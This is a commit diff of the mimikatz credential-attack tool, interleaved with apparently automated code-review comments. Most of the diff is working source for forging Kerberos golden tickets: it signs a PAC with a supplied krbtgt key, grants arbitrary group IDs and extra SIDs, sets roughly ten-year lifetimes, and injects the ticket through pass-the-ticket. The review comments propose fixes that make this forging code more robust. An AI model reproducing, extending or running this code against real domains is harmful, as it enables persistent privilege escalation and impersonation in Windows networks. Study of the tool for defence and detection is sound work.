[fix] don't ask me why, but fixing previous SVN commit
This commit is contained in:
parent
2f66115ccd
commit
a0f243b335
@ -16,6 +16,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "inc", "inc", "{282B4B77-BFF
|
||||
inc\DbgHelp.h = inc\DbgHelp.h
|
||||
inc\DhcpSSdk.h = inc\DhcpSSdk.h
|
||||
inc\DsGetDC.h = inc\DsGetDC.h
|
||||
inc\Fci.h = inc\Fci.h
|
||||
inc\fltUser.h = inc\fltUser.h
|
||||
inc\fltUserStructures.h = inc\fltUserStructures.h
|
||||
inc\globals.h = inc\globals.h
|
||||
|
@ -29,6 +29,7 @@ const KUHL_M * mimikatz_modules[] = {
|
||||
&kuhl_m_sid,
|
||||
&kuhl_m_iis,
|
||||
&kuhl_m_rpc,
|
||||
&kuhl_m_sr98,
|
||||
};
|
||||
|
||||
int wmain(int argc, wchar_t * argv[])
|
||||
|
@ -30,6 +30,7 @@
|
||||
#include "modules/kuhl_m_sid.h"
|
||||
#include "modules/kuhl_m_iis.h"
|
||||
#include "modules/kuhl_m_rpc.h"
|
||||
#include "modules/kuhl_m_sr98.h"
|
||||
|
||||
#include <io.h>
|
||||
#include <fcntl.h>
|
||||
|
@ -21,7 +21,7 @@ BLOCK "StringFileInfo"
|
||||
VALUE "FileDescription", "mimikatz for Windows"
|
||||
VALUE "FileVersion", "2.1.1.0"
|
||||
VALUE "InternalName", "mimikatz"
|
||||
VALUE "LegalCopyright", "Copyright (c) 2007 - 2017 gentilkiwi (Benjamin DELPY)"
|
||||
VALUE "LegalCopyright", "Copyright (c) 2007 - 2018 gentilkiwi (Benjamin DELPY)"
|
||||
VALUE "OriginalFilename", "mimikatz.exe"
|
||||
VALUE "PrivateBuild", "Build with love for POC only"
|
||||
VALUE "SpecialBuild", "kiwi flavor !"
|
||||
|
@ -141,6 +141,7 @@
|
||||
<ClCompile Include="mimikatz.c" />
|
||||
<ClCompile Include="modules\crypto\kuhl_m_crypto_extractor.c" />
|
||||
<ClCompile Include="modules\crypto\kuhl_m_crypto_patch.c" />
|
||||
<ClCompile Include="modules\crypto\kuhl_m_crypto_sc.c" />
|
||||
<ClCompile Include="modules\dpapi\kuhl_m_dpapi.c" />
|
||||
<ClCompile Include="modules\dpapi\kuhl_m_dpapi_oe.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.c" />
|
||||
@ -163,6 +164,7 @@
|
||||
<ClCompile Include="modules\kuhl_m_net.c" />
|
||||
<ClCompile Include="modules\kuhl_m_privilege.c" />
|
||||
<ClCompile Include="modules\kuhl_m_process.c" />
|
||||
<ClCompile Include="modules\kuhl_m_sr98.c" />
|
||||
<ClCompile Include="modules\kuhl_m_rpc.c" />
|
||||
<ClCompile Include="modules\kuhl_m_service.c" />
|
||||
<ClCompile Include="modules\kuhl_m_service_remote.c" />
|
||||
@ -230,6 +232,7 @@
|
||||
<ClInclude Include="mimikatz.h" />
|
||||
<ClInclude Include="modules\crypto\kuhl_m_crypto_extractor.h" />
|
||||
<ClInclude Include="modules\crypto\kuhl_m_crypto_patch.h" />
|
||||
<ClInclude Include="modules\crypto\kuhl_m_crypto_sc.h" />
|
||||
<ClInclude Include="modules\dpapi\kuhl_m_dpapi.h" />
|
||||
<ClInclude Include="modules\dpapi\kuhl_m_dpapi_oe.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.h" />
|
||||
@ -253,6 +256,7 @@
|
||||
<ClInclude Include="modules\kuhl_m_net.h" />
|
||||
<ClInclude Include="modules\kuhl_m_privilege.h" />
|
||||
<ClInclude Include="modules\kuhl_m_process.h" />
|
||||
<ClInclude Include="modules\kuhl_m_sr98.h" />
|
||||
<ClInclude Include="modules\kuhl_m_rpc.h" />
|
||||
<ClInclude Include="modules\kuhl_m_service.h" />
|
||||
<ClInclude Include="modules\kuhl_m_service_remote.h" />
|
||||
|
@ -248,6 +248,12 @@
|
||||
<ClCompile Include="modules\crypto\kuhl_m_crypto_patch.c">
|
||||
<Filter>local modules\crypto</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="modules\kuhl_m_sr98.c">
|
||||
<Filter>local modules</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="modules\crypto\kuhl_m_crypto_sc.c">
|
||||
<Filter>local modules\crypto</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="mimikatz.h" />
|
||||
@ -515,6 +521,12 @@
|
||||
<ClInclude Include="modules\crypto\kuhl_m_crypto_patch.h">
|
||||
<Filter>local modules\crypto</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="modules\kuhl_m_sr98.h">
|
||||
<Filter>local modules</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="modules\crypto\kuhl_m_crypto_sc.h">
|
||||
<Filter>local modules\crypto</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Filter Include="local modules">
|
||||
|
@ -65,8 +65,7 @@ NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[])
|
||||
kprintf(L"* Directory: \'%s\'\n", argv[i]);
|
||||
kull_m_file_Find(argv[i], L"*.kirbi", FALSE, 0, FALSE, kuhl_m_kerberos_ptt_directory, NULL);
|
||||
}
|
||||
else
|
||||
kuhl_m_kerberos_ptt_directory(0, argv[i], PathFindFileName(argv[i]), NULL);
|
||||
else kuhl_m_kerberos_ptt_directory(0, argv[i], PathFindFileName(argv[i]), NULL);
|
||||
}
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
@ -78,7 +77,7 @@ BOOL CALLBACK kuhl_m_kerberos_ptt_directory(DWORD level, PCWCHAR fullpath, PCWCH
|
||||
kprintf(L"\n* File: \'%s\': ", fullpath);
|
||||
kuhl_m_kerberos_ptt_file(fullpath);
|
||||
}
|
||||
return TRUE;
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
void kuhl_m_kerberos_ptt_file(PCWCHAR filename)
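Review bot: The flipped callback result (`return TRUE` → `return FALSE`) in kuhl_m_kerberos_ptt_directory changes how the enclosing kull_m_file_Find enumeration proceeds, yet nothing at the return site records what FALSE means, so the next reader cannot tell "continue" from "failure". A one-line comment would pin the contract this fix relies on: `return FALSE; // keep enumerating: kull_m_file_Find stops once a callback returns TRUE (confirm against kull_m_file.c)`. That semantics is inferred from the directory branch of kuhl_m_kerberos_ptt in the previous hunk, which hands this callback to kull_m_file_Find over a whole `*.kirbi` directory, not from anything visible here, so verify it before landing the wording. The callback's signature and the start of its body are outside the hunk.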
|
||||
@ -410,10 +409,10 @@ wchar_t * kuhl_m_kerberos_generateFileName_short(PKIWI_KERBEROS_TICKET ticket, L
|
||||
NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
|
||||
{
|
||||
BYTE key[AES_256_KEY_LENGTH] = {0};
|
||||
DWORD i, j, nbGroups, nbSids = 0, id = 500, keyType = 0, rodc = 0;
|
||||
PCWCHAR szUser, szDomain, szService = NULL, szTarget = NULL, szSid, szKey = NULL, szId, szGroups, szSids, szRodc, szLifetime, szClaims, /*base,*/ filename;
|
||||
PWCHAR baseDot, netbiosDomain;
|
||||
PISID pSid;
|
||||
DWORD keyType = 0, i, j, id = 500, nbGroups, nbSids = 0, rodc = 0;
|
||||
PCWCHAR szUser, szDomain, szService = NULL, szTarget = NULL, szKey = NULL, szLifetime, szSid, szId, szGroups, szSids, szClaims, szRodc, filename;
|
||||
PWCHAR baseDot, netbiosDomain = NULL;
|
||||
PISID pSid = NULL;
|
||||
PGROUP_MEMBERSHIP groups = NULL;
|
||||
PKERB_SID_AND_ATTRIBUTES sids = NULL;
|
||||
PCLAIMS_SET pClaimsSet = NULL;
|
||||
@ -424,126 +423,107 @@ NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
|
||||
BOOL isPtt = kull_m_string_args_byName(argc, argv, L"ptt", NULL, NULL);
|
||||
|
||||
kull_m_string_args_byName(argc, argv, L"ticket", &filename, L"ticket." MIMIKATZ_KERBEROS_EXT);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"admin", &szUser, NULL) || kull_m_string_args_byName(argc, argv, L"user", &szUser, NULL))
|
||||
{
|
||||
if(kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
|
||||
{
|
||||
if(baseDot = wcschr(szDomain, L'.'))
|
||||
{
|
||||
i = (DWORD) ((PBYTE) baseDot - (PBYTE) szDomain);
|
||||
if(netbiosDomain = (PWCHAR) LocalAlloc(LPTR, i + sizeof(wchar_t)))
|
||||
if(kull_m_string_args_byName(argc, argv, L"des", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_DES_CBC_MD5;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"rc4", &szKey, NULL) || kull_m_string_args_byName(argc, argv, L"krbtgt", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_RC4_HMAC_NT;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"aes128", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"aes256", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
|
||||
|
||||
if(szKey)
|
||||
{
|
||||
for(j = 0; j < i / sizeof(wchar_t); j++)
|
||||
netbiosDomain[j] = towupper(szDomain[j]);
|
||||
kull_m_string_args_byName(argc, argv, L"service", &szService, NULL);
|
||||
kull_m_string_args_byName(argc, argv, L"target", &szTarget, NULL);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"sid", &szSid, NULL))
|
||||
status = CDLocateCSystem(keyType, &pCSystem);
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
if(ConvertStringSidToSid(szSid, (PSID *) &pSid))
|
||||
if(kull_m_string_stringToHex(szKey, key, pCSystem->KeySize))
|
||||
{
|
||||
if(kull_m_string_args_byName(argc, argv, L"des", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_DES_CBC_MD5;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"rc4", &szKey, NULL) || kull_m_string_args_byName(argc, argv, L"krbtgt", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_RC4_HMAC_NT;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"aes128", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
|
||||
else if(kull_m_string_args_byName(argc, argv, L"aes256", &szKey, NULL))
|
||||
keyType = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
|
||||
|
||||
if(szKey)
|
||||
kull_m_string_args_byName(argc, argv, L"startoffset", &szLifetime, L"0");
|
||||
GetSystemTimeAsFileTime(&lifeTimeData.TicketStart);
|
||||
*(PULONGLONG) &lifeTimeData.TicketStart -= *(PULONGLONG) &lifeTimeData.TicketStart % 10000000 - ((LONGLONG) wcstol(szLifetime, NULL, 0) * 10000000 * 60);
|
||||
lifeTimeData.TicketRenew = lifeTimeData.TicketEnd = lifeTimeData.TicketStart;
|
||||
kull_m_string_args_byName(argc, argv, L"endin", &szLifetime, L"5256000"); // ~ 10 years
|
||||
*(PULONGLONG) &lifeTimeData.TicketEnd += (ULONGLONG) 10000000 * 60 * wcstoul(szLifetime, NULL, 0);
|
||||
kull_m_string_args_byName(argc, argv, L"renewmax", &szLifetime, szLifetime);
|
||||
*(PULONGLONG) &lifeTimeData.TicketRenew += (ULONGLONG) 10000000 * 60 * wcstoul(szLifetime, NULL, 0);
|
||||
kprintf(L"User : %s\nDomain : %s", szUser, szDomain);
|
||||
if(kull_m_string_args_byName(argc, argv, L"sid", &szSid, NULL))
|
||||
{
|
||||
kull_m_string_args_byName(argc, argv, L"service", &szService, NULL);
|
||||
kull_m_string_args_byName(argc, argv, L"target", &szTarget, NULL);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"id", &szId, NULL))
|
||||
id = wcstoul(szId, NULL, 0);
|
||||
if(kull_m_string_args_byName(argc, argv, L"rodc", &szRodc, NULL))
|
||||
rodc = wcstoul(szRodc, NULL, 0);
|
||||
kull_m_string_args_byName(argc, argv, L"groups", &szGroups, NULL);
|
||||
kuhl_m_pac_stringToGroups(szGroups, &groups, &nbGroups);
|
||||
if(kull_m_string_args_byName(argc, argv, L"sids", &szSids, NULL))
|
||||
kuhl_m_pac_stringToSids(szSids, &sids, &nbSids);
|
||||
if(kull_m_string_args_byName(argc, argv, L"claims", &szClaims, NULL))
|
||||
pClaimsSet = kuhl_m_kerberos_claims_createFromString(szClaims);
|
||||
|
||||
status = CDLocateCSystem(keyType, &pCSystem);
|
||||
if(NT_SUCCESS(status))
|
||||
if(ConvertStringSidToSid(szSid, (PSID *) &pSid))
|
||||
{
|
||||
if(kull_m_string_stringToHex(szKey, key, pCSystem->KeySize))
|
||||
i = (DWORD) ((PBYTE) baseDot - (PBYTE) szDomain);
|
||||
if(netbiosDomain = (PWCHAR) LocalAlloc(LPTR, i + sizeof(wchar_t)))
|
||||
for(j = 0; j < i / sizeof(wchar_t); j++)
|
||||
netbiosDomain[j] = towupper(szDomain[j]);
|
||||
if(kull_m_string_args_byName(argc, argv, L"id", &szId, NULL))
|
||||
id = wcstoul(szId, NULL, 0);
|
||||
kull_m_string_args_byName(argc, argv, L"groups", &szGroups, NULL);
|
||||
kuhl_m_pac_stringToGroups(szGroups, &groups, &nbGroups);
|
||||
if(kull_m_string_args_byName(argc, argv, L"sids", &szSids, NULL))
|
||||
kuhl_m_pac_stringToSids(szSids, &sids, &nbSids);
|
||||
if(kull_m_string_args_byName(argc, argv, L"claims", &szClaims, NULL))
|
||||
pClaimsSet = kuhl_m_kerberos_claims_createFromString(szClaims);
|
||||
if(kull_m_string_args_byName(argc, argv, L"rodc", &szRodc, NULL))
|
||||
rodc = wcstoul(szRodc, NULL, 0);
|
||||
kprintf(L" (%s)\nSID : %s\nUser Id : %u\nGroups Id : *", netbiosDomain, szSid, id);
|
||||
for(i = 0; i < nbGroups; i++)
|
||||
kprintf(L"%u ", groups[i].RelativeId);
|
||||
if(nbSids)
|
||||
{
|
||||
kull_m_string_args_byName(argc, argv, L"startoffset", &szLifetime, L"0");
|
||||
GetSystemTimeAsFileTime(&lifeTimeData.TicketStart);
|
||||
*(PULONGLONG) &lifeTimeData.TicketStart -= *(PULONGLONG) &lifeTimeData.TicketStart % 10000000 - ((LONGLONG) wcstol(szLifetime, NULL, 0) * 10000000 * 60);
|
||||
lifeTimeData.TicketRenew = lifeTimeData.TicketEnd = lifeTimeData.TicketStart;
|
||||
kull_m_string_args_byName(argc, argv, L"endin", &szLifetime, L"5256000"); // ~ 10 years
|
||||
*(PULONGLONG) &lifeTimeData.TicketEnd += (ULONGLONG) 10000000 * 60 * wcstoul(szLifetime, NULL, 0);
|
||||
kull_m_string_args_byName(argc, argv, L"renewmax", &szLifetime, szLifetime);
|
||||
*(PULONGLONG) &lifeTimeData.TicketRenew += (ULONGLONG) 10000000 * 60 * wcstoul(szLifetime, NULL, 0);
|
||||
|
||||
kprintf(
|
||||
L"User : %s\n"
|
||||
L"Domain : %s (%s)\n"
|
||||
L"SID : %s\n"
|
||||
L"User Id : %u\n", szUser, szDomain, netbiosDomain, szSid, id);
|
||||
kprintf(L"Groups Id : *");
|
||||
for(i = 0; i < nbGroups; i++)
|
||||
kprintf(L"%u ", groups[i].RelativeId);
|
||||
if(nbSids)
|
||||
kprintf(L"\nExtra SIDs: ");
|
||||
for(i = 0; i < nbSids; i++)
|
||||
{
|
||||
kprintf(L"\nExtra SIDs: ");
|
||||
for(i = 0; i < nbSids; i++)
|
||||
{
|
||||
kull_m_string_displaySID(sids[i].Sid);
|
||||
kprintf(L" ; ");
|
||||
}
|
||||
kull_m_string_displaySID(sids[i].Sid);
|
||||
kprintf(L" ; ");
|
||||
}
|
||||
if(pClaimsSet)
|
||||
{
|
||||
kprintf(L"\nClaims :\n");
|
||||
kuhl_m_kerberos_claims_displayClaimsSet(pClaimsSet);
|
||||
}
|
||||
kprintf(L"\nServiceKey: ");
|
||||
kull_m_string_wprintf_hex(key, pCSystem->KeySize, 0); kprintf(L" - %s\n", kuhl_m_kerberos_ticket_etype(keyType));
|
||||
if(szService)
|
||||
kprintf(L"Service : %s\n", szService);
|
||||
if(szTarget)
|
||||
kprintf(L"Target : %s\n", szTarget);
|
||||
kprintf(L"Lifetime : ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketStart); kprintf(L" ; ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketEnd); kprintf(L" ; ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketRenew); kprintf(L"\n");
|
||||
|
||||
kprintf(L"-> Ticket : %s\n\n", isPtt ? L"** Pass The Ticket **" : filename);
|
||||
|
||||
if(BerApp_KrbCred = kuhl_m_kerberos_golden_data(szUser, szDomain, netbiosDomain, szService, szTarget, &lifeTimeData, pSid, key, pCSystem->KeySize, keyType, id, groups, nbGroups, sids, nbSids, rodc, pClaimsSet))
|
||||
{
|
||||
if(isPtt)
|
||||
{
|
||||
if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(BerApp_KrbCred->bv_val, BerApp_KrbCred->bv_len)))
|
||||
kprintf(L"\nGolden ticket for '%s @ %s' successfully submitted for current session\n", szUser, szDomain);
|
||||
}
|
||||
else if(kull_m_file_writeData(filename, BerApp_KrbCred->bv_val, BerApp_KrbCred->bv_len))
|
||||
kprintf(L"\nFinal Ticket Saved to file !\n");
|
||||
else PRINT_ERROR_AUTO(L"\nkull_m_file_writeData");
|
||||
|
||||
ber_bvfree(BerApp_KrbCred);
|
||||
}
|
||||
else PRINT_ERROR(L"BerApp_KrbCred error\n");
|
||||
}
|
||||
else PRINT_ERROR(L"Krbtgt key size length must be %u (%u bytes) for %s\n", pCSystem->KeySize * 2, pCSystem->KeySize, kuhl_m_kerberos_ticket_etype(keyType));
|
||||
if(pClaimsSet)
|
||||
{
|
||||
kprintf(L"\nClaims :\n");
|
||||
kuhl_m_kerberos_claims_displayClaimsSet(pClaimsSet);
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"Unable to locate CryptoSystem for ETYPE %u (error 0x%08x) - AES only available on NT6\n", keyType, status);
|
||||
}
|
||||
else PRINT_ERROR(L"Missing krbtgt key argument (/rc4 or /aes128 or /aes256)\n");
|
||||
|
||||
LocalFree(pSid);
|
||||
kprintf(L"\nServiceKey: ");
|
||||
kull_m_string_wprintf_hex(key, pCSystem->KeySize, 0); kprintf(L" - %s\n", kuhl_m_kerberos_ticket_etype(keyType));
|
||||
if(szService)
|
||||
kprintf(L"Service : %s\n", szService);
|
||||
if(szTarget)
|
||||
kprintf(L"Target : %s\n", szTarget);
|
||||
kprintf(L"Lifetime : ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketStart); kprintf(L" ; ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketEnd); kprintf(L" ; ");
|
||||
kull_m_string_displayLocalFileTime(&lifeTimeData.TicketRenew); kprintf(L"\n");
|
||||
kprintf(L"-> Ticket : %s\n\n", isPtt ? L"** Pass The Ticket **" : filename);
|
||||
if(BerApp_KrbCred = kuhl_m_kerberos_golden_data(szUser, szDomain, szService, szTarget, &lifeTimeData, key, pCSystem->KeySize, keyType, pSid, netbiosDomain, id, groups, nbGroups, sids, nbSids, rodc, pClaimsSet))
|
||||
{
|
||||
if(isPtt)
|
||||
{
|
||||
if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(BerApp_KrbCred->bv_val, BerApp_KrbCred->bv_len)))
|
||||
kprintf(L"\nGolden ticket for '%s @ %s' successfully submitted for current session\n", szUser, szDomain);
|
||||
}
|
||||
else if(kull_m_file_writeData(filename, BerApp_KrbCred->bv_val, BerApp_KrbCred->bv_len))
|
||||
kprintf(L"\nFinal Ticket Saved to file !\n");
|
||||
else PRINT_ERROR_AUTO(L"\nkull_m_file_writeData");
|
||||
ber_bvfree(BerApp_KrbCred);
|
||||
}
|
||||
else PRINT_ERROR(L"BerApp_KrbCred error\n");
|
||||
}
|
||||
else PRINT_ERROR_AUTO(L"SID seems invalid - ConvertStringSidToSid");
|
||||
else PRINT_ERROR(L"Krbtgt key size length must be %u (%u bytes) for %s\n", pCSystem->KeySize * 2, pCSystem->KeySize, kuhl_m_kerberos_ticket_etype(keyType));
|
||||
}
|
||||
else PRINT_ERROR(L"Missing SID argument\n");
|
||||
|
||||
LocalFree(netbiosDomain);
|
||||
else PRINT_ERROR(L"Unable to locate CryptoSystem for ETYPE %u (error 0x%08x) - AES only available on NT6\n", keyType, status);
|
||||
}
|
||||
else PRINT_ERROR(L"Missing krbtgt key argument (/rc4 or /aes128 or /aes256)\n");
|
||||
}
|
||||
else PRINT_ERROR(L"Domain name does not look like a FQDN\n");
|
||||
}
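Review bot: The restructured kuhl_m_kerberos_golden drops the allocation-failure guard around the NetBIOS domain: in the new order `if(netbiosDomain = (PWCHAR) LocalAlloc(LPTR, i + sizeof(wchar_t)))` only covers the `towupper` copy loop, after which execution falls through to the `kprintf(L" (%s)\nSID ...", netbiosDomain, ...)` and to `kuhl_m_kerberos_golden_data(..., pSid, netbiosDomain, ...)` with netbiosDomain still NULL. The old code braced everything down to the golden_data call under that allocation, so the failure was a no-op rather than a NULL `%s` argument and a NULL LogonDomainName handed to the PAC builder. The guard should again enclose the remainder of the SID branch, with `else PRINT_ERROR_AUTO(L"LocalAlloc");` so the operator sees why no ticket was produced; since netbiosDomain is initialised to NULL and freed unconditionally at the end of the function, no other cleanup changes are needed. The function begins in the previous hunk and its cleanup continues in the next.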
|
||||
@ -551,6 +531,10 @@ NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
|
||||
}
|
||||
else PRINT_ERROR(L"Missing user argument\n");
|
||||
|
||||
if(pSid)
|
||||
LocalFree(pSid);
|
||||
if(netbiosDomain)
|
||||
LocalFree(netbiosDomain);
|
||||
if(groups && nbGroups)
|
||||
LocalFree(groups);
|
||||
if(sids && nbSids)
|
||||
@ -561,7 +545,6 @@ NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
|
||||
}
|
||||
if(pClaimsSet)
|
||||
kuhl_m_kerberos_claims_free(pClaimsSet);
|
||||
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
@ -597,12 +580,12 @@ NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD
|
||||
return status;
|
||||
}
|
||||
|
||||
PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWSTR LogonDomainName, LPCWSTR servicename, LPCWSTR targetname, PKUHL_M_KERBEROS_LIFETIME_DATA lifetime, PISID sid, LPCBYTE key, DWORD keySize, DWORD keyType, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups, PKERB_SID_AND_ATTRIBUTES sids, DWORD cbSids, DWORD rodc, PCLAIMS_SET pClaimsSet)
|
||||
PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWSTR servicename, LPCWSTR targetname, PKUHL_M_KERBEROS_LIFETIME_DATA lifetime, LPCBYTE key, DWORD keySize, DWORD keyType, PISID sid, LPCWSTR LogonDomainName, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups, PKERB_SID_AND_ATTRIBUTES sids, DWORD cbSids, DWORD rodc, PCLAIMS_SET pClaimsSet)
|
||||
{
|
||||
NTSTATUS status;
|
||||
NTSTATUS status = STATUS_INVALID_PARAMETER;
|
||||
KIWI_KERBEROS_TICKET ticket = {0};
|
||||
PKERB_VALIDATION_INFO pValidationInfo;
|
||||
PPACTYPE pacType; DWORD pacTypeSize;
|
||||
PKERB_VALIDATION_INFO pValidationInfo = NULL;
|
||||
PPACTYPE pacType = NULL; DWORD pacTypeSize = 0;
|
||||
LONG SignatureType;
|
||||
PBERVAL BerApp_EncTicketPart, BerApp_KrbCred = NULL;
|
||||
|
||||
@ -646,35 +629,43 @@ PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWST
|
||||
default:
|
||||
SignatureType = KERB_CHECKSUM_HMAC_MD5;
|
||||
}
|
||||
|
||||
if(pValidationInfo = kuhl_m_pac_infoToValidationInfo(&lifetime->TicketStart, username, domainname, LogonDomainName, sid, userid, groups, cbGroups, sids, cbSids))
|
||||
|
||||
if(sid) // we want a PAC !
|
||||
{
|
||||
if(kuhl_m_pac_validationInfo_to_PAC(pValidationInfo, NULL, NULL, SignatureType, pClaimsSet, &pacType, &pacTypeSize))
|
||||
if(pValidationInfo = kuhl_m_pac_infoToValidationInfo(&lifetime->TicketStart, username, domainname, LogonDomainName, sid, userid, groups, cbGroups, sids, cbSids))
|
||||
{
|
||||
kprintf(L" * PAC generated\n");
|
||||
status = kuhl_m_pac_signature(pacType, pacTypeSize, SignatureType, key, keySize);
|
||||
if(kuhl_m_pac_validationInfo_to_PAC(pValidationInfo, NULL, NULL, SignatureType, pClaimsSet, &pacType, &pacTypeSize))
|
||||
{
|
||||
kprintf(L" * PAC generated\n");
|
||||
status = kuhl_m_pac_signature(pacType, pacTypeSize, SignatureType, key, keySize);
|
||||
if(NT_SUCCESS(status))
|
||||
kprintf(L" * PAC signed\n");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if(!sid || NT_SUCCESS(status))
|
||||
{
|
||||
if(BerApp_EncTicketPart = kuhl_m_kerberos_ticket_createAppEncTicketPart(&ticket, pacType, pacTypeSize))
|
||||
{
|
||||
kprintf(L" * EncTicketPart generated\n");
|
||||
status = kuhl_m_kerberos_encrypt(keyType, KRB_KEY_USAGE_AS_REP_TGS_REP, key, keySize, BerApp_EncTicketPart->bv_val, BerApp_EncTicketPart->bv_len, (LPVOID *) &ticket.Ticket.Value, &ticket.Ticket.Length, TRUE);
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
kprintf(L" * PAC signed\n");
|
||||
if(BerApp_EncTicketPart = kuhl_m_kerberos_ticket_createAppEncTicketPart(&ticket, pacType, pacTypeSize))
|
||||
{
|
||||
kprintf(L" * EncTicketPart generated\n");
|
||||
status = kuhl_m_kerberos_encrypt(keyType, KRB_KEY_USAGE_AS_REP_TGS_REP, key, keySize, BerApp_EncTicketPart->bv_val, BerApp_EncTicketPart->bv_len, (LPVOID *) &ticket.Ticket.Value, &ticket.Ticket.Length, TRUE);
|
||||
if(NT_SUCCESS(status))
|
||||
{
|
||||
kprintf(L" * EncTicketPart encrypted\n");
|
||||
if(BerApp_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(&ticket, FALSE))
|
||||
kprintf(L" * KrbCred generated\n");
|
||||
LocalFree(ticket.Ticket.Value);
|
||||
}
|
||||
else PRINT_ERROR(L"kuhl_m_kerberos_encrypt %08x\n", status);
|
||||
ber_bvfree(BerApp_EncTicketPart);
|
||||
}
|
||||
kprintf(L" * EncTicketPart encrypted\n");
|
||||
if(BerApp_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(&ticket, FALSE))
|
||||
kprintf(L" * KrbCred generated\n");
|
||||
LocalFree(ticket.Ticket.Value);
|
||||
}
|
||||
LocalFree(pacType);
|
||||
else PRINT_ERROR(L"kuhl_m_kerberos_encrypt %08x\n", status);
|
||||
ber_bvfree(BerApp_EncTicketPart);
|
||||
}
|
||||
LocalFree(pValidationInfo);
|
||||
}
|
||||
|
||||
if(pacType)
|
||||
LocalFree(pacType);
|
||||
if(pValidationInfo)
|
||||
LocalFree(pValidationInfo);
|
||||
if(ticket.Key.Value)
|
||||
LocalFree(ticket.Key.Value);
|
||||
if(ticket.ClientName)
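Review bot: In the new `if(sid) // we want a PAC !` block of kuhl_m_kerberos_golden_data every failure is silent: if kuhl_m_pac_infoToValidationInfo returns NULL, kuhl_m_pac_validationInfo_to_PAC returns FALSE, or kuhl_m_pac_signature fails, status stays at the STATUS_INVALID_PARAMETER it was initialised to, the `if(!sid || NT_SUCCESS(status))` gate is skipped, and the only message the caller ever prints is the generic "BerApp_KrbCred error". A failed PAC signature (e.g. a checksum/key-length mismatch for the chosen etype) is therefore indistinguishable from an allocation failure. Two one-liners would make the paths diagnosable: `else PRINT_ERROR(L"kuhl_m_pac_signature %08x\n", status);` after the `if(NT_SUCCESS(status))` signed-check, and `else PRINT_ERROR(L"kuhl_m_pac_validationInfo_to_PAC\n");` on the PAC-generation branch, matching the `kuhl_m_kerberos_encrypt %08x` message already used below. The function's signature is in an earlier hunk and its cleanup runs past the end of this one.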
|
||||
|
@ -42,5 +42,5 @@ NTSTATUS kuhl_m_kerberos_test(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kerberos_hash_data(LONG keyType, PCUNICODE_STRING pString, PCUNICODE_STRING pSalt, DWORD count);
|
||||
wchar_t * kuhl_m_kerberos_generateFileName(const DWORD index, PKERB_TICKET_CACHE_INFO_EX ticket, LPCWSTR ext);
|
||||
wchar_t * kuhl_m_kerberos_generateFileName_short(PKIWI_KERBEROS_TICKET ticket, LPCWSTR ext);
|
||||
PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWSTR LogonDomainName, LPCWSTR servicename, LPCWSTR targetname, PKUHL_M_KERBEROS_LIFETIME_DATA lifetime, PISID sid, LPCBYTE key, DWORD keySize, DWORD keyType, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups, PKERB_SID_AND_ATTRIBUTES sids, DWORD cbSids, DWORD rodc, PCLAIMS_SET pClaimsSet);
|
||||
